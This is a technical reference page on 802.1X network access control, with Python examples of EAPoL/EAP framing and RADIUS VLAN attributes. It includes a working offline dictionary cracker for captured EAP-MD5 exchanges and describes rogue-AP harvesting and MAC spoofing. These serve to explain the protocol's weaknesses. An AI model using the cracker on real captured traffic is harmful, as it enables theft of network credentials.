802.1X

Port-based network access control for authenticating devices before granting network access

802.1X Port-Based Network Access Control

  • Authentication framework that controls network access at the port level before allowing devices onto the network
  • Uses three key components working together: Supplicant (client device), Authenticator (network switch/AP), and Authentication Server (typically RADIUS)
  • Operates at Layer 2, making access decisions before IP addresses are assigned or network resources become available

Authentication Process Flow

  • Either side can start the exchange: the supplicant sends an EAPoL-Start frame (EtherType 0x888E, to the PAE group address 01:80:C2:00:00:03), or the authenticator sends an EAP-Request/Identity as soon as the link comes up
  • Authenticator keeps the port in the unauthorized state and relays EAP between the two sides: EAPoL toward the supplicant, RADIUS (EAP-Message attributes in Access-Request/Access-Challenge) toward the server; it does not interpret the EAP method itself
  • Authentication Server runs the EAP method (EAP-TLS, PEAP, EAP-TTLS) against the supplicant, validates the credentials, and answers with Access-Accept or Access-Reject
  • On Access-Accept the server's EAP-Success is relayed to the supplicant, the authenticator moves the port to the authorized state (applying any VLAN or ACL the server returned) and normal traffic flows; EAP-Failure, EAPoL-Logoff, link-down or a failed re-authentication return the port to unauthorized
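The exchange described above, as an added example that is not part of the original page: it builds real EAPoL and EAP packets (IEEE 802.1X EAPoL header, RFC 3748 EAP packet) and a minimal authenticator that relays EAP and changes its port state only on EAP-Success or EAP-Failure. The RADIUS leg is replaced by a local stand-in, make_server(), which is an assumption of this demo; it runs EAP-MD5 purely because that method completes in two rounds and fits in a few lines, not because it is recommended.

```python
"""EAPoL/EAP framing and the authenticator port state for one 802.1X exchange.
Added example, not code from the page; wire formats follow IEEE 802.1X and RFC 3748.
make_server() stands in for RADIUS (an assumption) and runs EAP-MD5 only for brevity."""
import hashlib
import hmac
import struct

EAPOL_VERSION = 2                                   # 802.1X-2004 frames
EAPOL_EAP_PACKET, EAPOL_START = 0, 1                # EAPoL packet types
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPE_IDENTITY, EAP_TYPE_MD5 = 1, 4

def build_eapol(ptype, body=b""):
    """EAPoL header: version(1) type(1) body-length(2), then the body."""
    return struct.pack("!BBH", EAPOL_VERSION, ptype, len(body)) + body

def parse_eapol(frame):
    version, ptype, length = struct.unpack("!BBH", frame[:4])
    return version, ptype, frame[4:4 + length]

def build_eap(code, ident, eap_type=None, data=b""):
    """EAP packet: code(1) identifier(1) length(2) [type(1) type-data]."""
    payload = b"" if eap_type is None else bytes([eap_type]) + data
    return struct.pack("!BBH", code, ident, 4 + len(payload)) + payload

def parse_eap(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    eap_type = pkt[4] if length > 4 else None       # Success/Failure carry no type
    return code, ident, eap_type, pkt[5:length]

def md5_chap(ident, password, challenge):
    """EAP-MD5 response value (RFC 1994 CHAP): MD5(identifier || secret || challenge)."""
    return hashlib.md5(bytes([ident]) + password.encode() + challenge).digest()

def make_server(credentials, challenge):
    """Stand-in for the RADIUS server (assumption); keeps one session's state."""
    session = {}

    def server(eap_response):
        code, ident, eap_type, data = parse_eap(eap_response)
        if code == EAP_RESPONSE and eap_type == EAP_TYPE_IDENTITY:
            session["identity"], session["id"] = data.decode(), (ident + 1) & 0xFF
            # MD5-Challenge request type-data: value-size(1) value(size)
            return build_eap(EAP_REQUEST, session["id"], EAP_TYPE_MD5, bytes([len(challenge)]) + challenge)
        if code == EAP_RESPONSE and eap_type == EAP_TYPE_MD5 and ident == session.get("id"):
            expected = md5_chap(ident, credentials.get(session["identity"], ""), challenge)
            if hmac.compare_digest(data[1:1 + data[0]], expected):
                return build_eap(EAP_SUCCESS, ident)
        return build_eap(EAP_FAILURE, ident)

    return server

def supplicant_reply(eap_request, identity, password):
    """What a supplicant answers to each EAP-Request; None for unknown types."""
    _, ident, eap_type, data = parse_eap(eap_request)
    if eap_type == EAP_TYPE_IDENTITY:
        return build_eap(EAP_RESPONSE, ident, EAP_TYPE_IDENTITY, identity.encode())
    if eap_type == EAP_TYPE_MD5:
        value = md5_chap(ident, password, data[1:1 + data[0]])
        return build_eap(EAP_RESPONSE, ident, EAP_TYPE_MD5, bytes([len(value)]) + value)
    return None

class Authenticator:
    """One switch port: relays EAP without interpreting the method; only an
    EAP-Success or EAP-Failure coming back from the server changes its state."""

    def __init__(self, server):
        self.server, self.port_state = server, "unauthorized"

    def handle_eapol(self, frame):
        # frame is the EAPoL PDU with the Ethernet header already stripped
        _, ptype, body = parse_eapol(frame)
        if ptype == EAPOL_START:                    # supplicant asks to authenticate
            self.port_state = "unauthorized"
            return build_eapol(EAPOL_EAP_PACKET, build_eap(EAP_REQUEST, 1, EAP_TYPE_IDENTITY))
        if ptype != EAPOL_EAP_PACKET or parse_eap(body)[0] != EAP_RESPONSE:
            return None
        server_pkt = self.server(body)              # EAP-Message inside RADIUS in real life
        code = parse_eap(server_pkt)[0]
        if code == EAP_SUCCESS:
            self.port_state = "authorized"
        elif code == EAP_FAILURE:
            self.port_state = "unauthorized"
        return build_eapol(EAPOL_EAP_PACKET, server_pkt)

def run_exchange(identity, password, credentials, challenge=bytes(range(16))):
    """Drive a full exchange; returns the final port state and the (code, type)
    of every EAP packet the authenticator sent toward the supplicant."""
    auth = Authenticator(make_server(credentials, challenge))
    trace, frame = [], build_eapol(EAPOL_START)
    while frame is not None and (reply := auth.handle_eapol(frame)) is not None:
        body = parse_eapol(reply)[2]
        code, _, eap_type, _ = parse_eap(body)
        trace.append((code, eap_type))
        if code in (EAP_SUCCESS, EAP_FAILURE):
            break
        answer = supplicant_reply(body, identity, password)
        frame = None if answer is None else build_eapol(EAPOL_EAP_PACKET, answer)
    return auth.port_state, trace
```

run_exchange("alice", "correct horse", {"alice": "correct horse"}) returns ("authorized", [(1, 1), (1, 4), (3, None)]): Request/Identity, Request/MD5-Challenge, Success. The Authenticator never looks at the MD5 data, which is the point of the design: the switch is a relay, and the security of the exchange is decided entirely by the EAP method and the server.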

Key Components

Component             | Role                                                    | Examples
Supplicant            | Client requesting network access                        | Windows/macOS built-in clients, wpa_supplicant on Linux
Authenticator         | Network device that enforces the port state and relays EAP | Cisco switches, wireless access points
Authentication Server | Validates credentials and returns the authorization result | Cisco ISE, Microsoft NPS, FreeRADIUS

EAP Methods Comparison

Method   | Security Level | Certificate Requirements                                      | Use Case
EAP-TLS  | Highest        | Client + server certs (mutual authentication)                 | High-security environments; needs a PKI and client enrollment
PEAP     | Medium-High    | Server cert only (inner EAP-MSCHAPv2 or EAP-GTC in a TLS tunnel) | Common enterprise deployment; supplicants must validate the server cert or a rogue AP can harvest credentials
EAP-TTLS | Medium-High    | Server cert only (inner PAP/CHAP/MSCHAPv2 in a TLS tunnel)    | Mixed client environments
EAP-MD5  | Low            | None (no server authentication, no key derivation)            | Legacy/testing only; cannot be used for wireless
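Why the table marks EAP-MD5 as Low and the notes say to keep it out of production, shown as an added example rather than code from the page: the response is MD5(identifier || password || challenge) (RFC 3748 section 5.4, reusing RFC 1994 CHAP), the challenge travels in the clear, and nothing authenticates the server, so whoever sees the two EAP packets, or stands up a rogue authenticator and picks the challenge, can test candidate passwords offline at MD5 speed. The capture and wordlist are constructed inside the block from a known password so it runs without a pcap.

```python
"""Offline dictionary attack on a captured EAP-MD5 exchange.
Added example, not from the page. The two EAP packets are constructed here from a
known password (there is no real capture); the attack code is the same either way."""
import hashlib
import struct

EAP_TYPE_MD5 = 4

def eap_md5_value(ident, password, challenge):
    # CHAP response value: MD5(identifier || secret || challenge)
    return hashlib.md5(bytes([ident]) + password.encode() + challenge).digest()

def _constructed_capture(ident, challenge, password):
    """Build the EAP-Request/MD5-Challenge and EAP-Response/MD5-Challenge packets
    exactly as they appear inside EAPoL (or a RADIUS EAP-Message) on the wire:
    code(1) id(1) length(2) type(1) value-size(1) value."""
    req_data = bytes([len(challenge)]) + challenge
    request = struct.pack("!BBH", 1, ident, 5 + len(req_data)) + bytes([EAP_TYPE_MD5]) + req_data
    value = eap_md5_value(ident, password, challenge)
    resp_data = bytes([len(value)]) + value
    response = struct.pack("!BBH", 2, ident, 5 + len(resp_data)) + bytes([EAP_TYPE_MD5]) + resp_data
    return request, response

def extract_md5_challenge(request, response):
    """Pull (identifier, challenge, response_value) out of the two EAP packets,
    checking the fields a parser must check before trusting them."""
    rcode, rid, rlen = struct.unpack("!BBH", request[:4])
    scode, sid, slen = struct.unpack("!BBH", response[:4])
    if (rcode, scode) != (1, 2) or rid != sid:
        raise ValueError("not a matching EAP request/response pair")
    if rlen > len(request) or slen > len(response) or rlen < 7 or slen < 7:
        raise ValueError("truncated packet")
    if request[4] != EAP_TYPE_MD5 or response[4] != EAP_TYPE_MD5:
        raise ValueError("not MD5-Challenge")
    csize, vsize = request[5], response[5]
    challenge, value = request[6:6 + csize], response[6:6 + vsize]
    if len(challenge) != csize or len(value) != 16:
        raise ValueError("bad value-size field")
    return rid, challenge, value

def crack_eap_md5(request, response, wordlist):
    """Return the first candidate whose MD5-Challenge value matches, else None."""
    ident, challenge, value = extract_md5_challenge(request, response)
    for candidate in wordlist:
        if eap_md5_value(ident, candidate, challenge) == value:
            return candidate
    return None

# Constructed sample exchange: identifier 7, a 16-byte challenge, password "Winter2024!"
SAMPLE_CHALLENGE = bytes.fromhex("9f86d081884c7d659a2feaa0c55ad015")
SAMPLE_REQUEST, SAMPLE_RESPONSE = _constructed_capture(7, SAMPLE_CHALLENGE, "Winter2024!")
SAMPLE_WORDLIST = ["password", "Summer2023!", "Winter2024!", "letmein"]
```

crack_eap_md5(SAMPLE_REQUEST, SAMPLE_RESPONSE, SAMPLE_WORDLIST) returns "Winter2024!". Because there is no salt beyond the public challenge and no key stretching, a real wordlist runs at hardware MD5 rates; and because the method yields no keying material, even a strong password gives no protection for the traffic that follows.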

Port States and Behavior

  • Unauthorized State: only EAPoL is forwarded (Cisco switches also pass CDP/LLDP and STP by default); DHCP, DNS or any other host traffic gets through only if the port runs in open (monitor) mode or a pre-authentication ACL explicitly permits it
  • Authorized State: full network access granted based on the authentication result and any applied authorization policy (VLAN, ACL)
  • Force-Authorized: 802.1X is bypassed and the port behaves as if every host had authenticated; this is the default port-control on Cisco switches, so enabling the authenticator without setting port-control to auto enforces nothing
  • Force-Unauthorized: port permanently blocked regardless of authentication attempts

VLAN Assignment Options

  • Dynamic VLAN Assignment: the authentication server returns Tunnel-Type=VLAN, Tunnel-Medium-Type=IEEE-802 and Tunnel-Private-Group-ID=<VLAN> in the Access-Accept, chosen by user/device identity; the VLAN must already exist on the switch for the assignment to take effect
  • Guest VLAN: pre-configured VLAN for hosts that never answer EAP-Request/Identity (no supplicant), applied after the configured number of retries; meant for non-802.1X devices, not for failed logins
  • Critical VLAN: VLAN applied when every RADIUS server is marked dead, so hosts keep connectivity during an outage; sessions should re-authenticate once a server recovers
  • Restricted VLAN (auth-fail VLAN): limited-access VLAN for hosts that have a supplicant but failed authentication a configured number of times, so a bad credential does not land a device in the guest VLAN
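Dynamic VLAN assignment and the fallback VLANs above, as an added example that is not part of the original page: it encodes and parses the three RFC 2868 tunnel attributes an authentication server returns in an Access-Accept (Tunnel-Type=VLAN, Tunnel-Medium-Type=IEEE-802, Tunnel-Private-Group-ID=<id>), validates them the way a switch must before trusting them, and maps each authentication outcome to the VLAN the port ends up in. PortPolicy and the event names are assumptions made for the demo; the attribute numbers and values come from RFC 2865, RFC 2868 and RFC 3580.

```python
"""RADIUS VLAN attributes and the per-port VLAN decision.
Added example, not from the page. Attribute encodings follow RFC 2865 (type/length/value)
and RFC 2868 (tagged Tunnel-* attributes); PortPolicy and the event strings in
decide_vlan() are assumptions modelled on the guest/restricted/critical VLAN behaviour."""
import struct
from dataclasses import dataclass
from typing import Optional

TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE, TUNNEL_PRIVATE_GROUP_ID = 64, 65, 81
TUNNEL_TYPE_VLAN = 13          # RFC 3580 section 3.31
TUNNEL_MEDIUM_IEEE_802 = 6

def encode_vlan_attrs(vlan_id, tag=1):
    """The three attributes a server returns in Access-Accept for dynamic VLAN
    assignment. Tunnel-Type/Medium-Type carry tag(1)+integer(3);
    Tunnel-Private-Group-ID carries tag(1)+string."""
    def attr(atype, value):
        return struct.pack("!BB", atype, 2 + len(value)) + value
    return (attr(TUNNEL_TYPE, bytes([tag]) + TUNNEL_TYPE_VLAN.to_bytes(3, "big"))
            + attr(TUNNEL_MEDIUM_TYPE, bytes([tag]) + TUNNEL_MEDIUM_IEEE_802.to_bytes(3, "big"))
            + attr(TUNNEL_PRIVATE_GROUP_ID, bytes([tag]) + str(vlan_id).encode()))

def parse_attrs(data):
    """Return [(type, value), ...] from a RADIUS attribute list, rejecting bad lengths."""
    attrs = []
    while data:
        if len(data) < 2:
            raise ValueError("truncated attribute")
        atype, alen = data[0], data[1]
        if alen < 2 or alen > len(data):
            raise ValueError("bad attribute length")
        attrs.append((atype, data[2:alen]))
        data = data[alen:]
    return attrs

def _split_tag(value):
    # RFC 2868: a leading byte greater than 0x1F is not a tag but part of the value
    if value and value[0] <= 0x1F:
        return value[0], value[1:]
    return 0, value

def vlan_from_access_accept(attrs):
    """Return the VLAN ID only if all three tunnel attributes are present, share a
    tag, and say 'VLAN over IEEE 802'; otherwise None (use the port default)."""
    by_tag = {}
    for atype, value in attrs:
        if atype in (TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE, TUNNEL_PRIVATE_GROUP_ID):
            tag, body = _split_tag(value)
            by_tag.setdefault(tag, {})[atype] = body
    for group in by_tag.values():
        if set(group) != {TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE, TUNNEL_PRIVATE_GROUP_ID}:
            continue
        if int.from_bytes(group[TUNNEL_TYPE], "big") != TUNNEL_TYPE_VLAN:
            continue
        if int.from_bytes(group[TUNNEL_MEDIUM_TYPE], "big") != TUNNEL_MEDIUM_IEEE_802:
            continue
        text = group[TUNNEL_PRIVATE_GROUP_ID].decode("ascii", "replace")
        if text.isdigit() and 1 <= int(text) <= 4094:
            return int(text)
    return None

@dataclass
class PortPolicy:
    default_vlan: int
    guest_vlan: Optional[int] = None
    restricted_vlan: Optional[int] = None
    critical_vlan: Optional[int] = None

def decide_vlan(policy, event, accept_attrs=b""):
    """Map an authentication outcome to the VLAN the port ends up in.
    event: 'accept' | 'reject' | 'no_supplicant' | 'server_dead'.
    Returns (vlan_or_None, reason); None means the port stays unauthorized."""
    if event == "accept":
        dynamic = vlan_from_access_accept(parse_attrs(accept_attrs))
        return (dynamic, "dynamic") if dynamic else (policy.default_vlan, "port default")
    if event == "reject":
        return (policy.restricted_vlan, "restricted") if policy.restricted_vlan else (None, "blocked")
    if event == "no_supplicant":
        return (policy.guest_vlan, "guest") if policy.guest_vlan else (None, "blocked")
    if event == "server_dead":
        return (policy.critical_vlan, "critical") if policy.critical_vlan else (None, "blocked")
    raise ValueError(f"unknown event {event!r}")
```

With PortPolicy(10, guest_vlan=900, restricted_vlan=901, critical_vlan=10), decide_vlan(policy, "accept", encode_vlan_attrs(42)) returns (42, "dynamic") while an Access-Accept whose Tunnel-Type is not VLAN falls back to (10, "port default"). The tag grouping matters in practice: a server may return several tagged tunnel groups, and a switch that matches attributes across tags can be steered into a VLAN the policy never intended.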

Implementation Scenarios

  • Wired Networks: prevents unauthorized devices from using network ports (conference rooms, lobbies, public areas); the authorization is bound to the port and MAC address, not to individual frames, so an inline device that keeps the link up can ride on an authenticated session unless MACsec is also deployed
  • Wireless Networks: authenticates users before providing network access (WPA2/WPA3-Enterprise); here the EAP method also derives the keying material for the air encryption, which is why EAP-MD5 cannot be used
  • MAC Authentication Bypass (MAB): fallback for devices without 802.1X support (printers, phones, cameras); once the EAP-Request/Identity retries are exhausted the switch sends the device's MAC address as username and password to RADIUS; a MAC address is trivially spoofed, so MAB hosts should be confined to a restricted VLAN or ACL
  • Multi-Domain Authentication: supports one data and one voice device on the same physical port, each authenticated separately

Configuration Considerations

  • Host Mode Settings: single-host (one MAC; a second MAC is a violation), multi-host (the whole port opens once the first device authenticates, so anything behind a hub or unmanaged switch rides along unauthenticated; avoid where possible), multi-domain (one data plus one voice device), or multi-auth (every MAC authenticates separately; the usual choice for ports behind unmanaged switches)
  • Timeout Values: tx-period (interval between EAP-Request/Identity retries) and max-reauth-req set how long a non-802.1X device waits before MAB or the guest VLAN applies; enable periodic re-authentication, ideally with the interval supplied by the server in Session-Timeout, so revoked users and stale MAB entries are not authorized indefinitely
  • Fallback Methods: configure MAB or guest VLAN access for non-802.1X capable devices, ordered after 802.1X so supplicant-capable hosts are not silently downgraded to MAC-based access
  • Port Security Integration: can work alongside port security (MAC address limits, violation actions) for additional protection; check which host modes your platform allows to combine with port security on the same port

Notes

  • 802.1X provides authentication (who you are) but relies on the authentication server for authorization (what you can access), returned as RADIUS attributes: a VLAN (Tunnel-Private-Group-ID), a named or downloadable ACL (Filter-Id or vendor-specific attributes), or a session timeout
  • Critical limitation: it is only as secure as the EAP method and the supplicant's validation of the server certificate; avoid EAP-MD5 in production (the challenge and the MD5 response cross the wire in the clear, so a captured exchange can be cracked offline with a dictionary, and the method neither authenticates the server nor derives keys), and configure PEAP/EAP-TTLS supplicants to check the server certificate so a rogue access point cannot harvest credentials
  • Wake-on-LAN consideration: an unauthorized port drops traffic in both directions by default, so magic packets from the network never reach the sleeping host; Cisco switches offer authentication control-direction in (unidirectional control) so traffic toward the host passes while frames from the host are still blocked until it authenticates
  • Troubleshooting tip: on Cisco IOS, show dot1x all verifies the global and per-port configuration, show authentication sessions interface <name> details shows the current session, method and applied VLAN/ACL, and debug dot1x events traces the exchange; on the server side, the RADIUS log gives the actual reject reason
  • Best practice: implement certificate-based authentication (EAP-TLS) for the highest security, but balance it against the PKI and enrollment work it needs (autoenrollment, SCEP or MDM for client certificates)
  • Remember that 802.1X secures the initial access to the network; once a port is authorized its frames are not inspected, so add periodic re-authentication, link-down session teardown and, where confidentiality on the link matters, MACsec (IEEE 802.1AE, keyed by the MKA protocol that 802.1X-2010 added)
  • Deployment strategy: start in monitor mode (Cisco authentication open with logging) to learn which devices would fail and why, then enforce on a pilot set of ports before closing the rest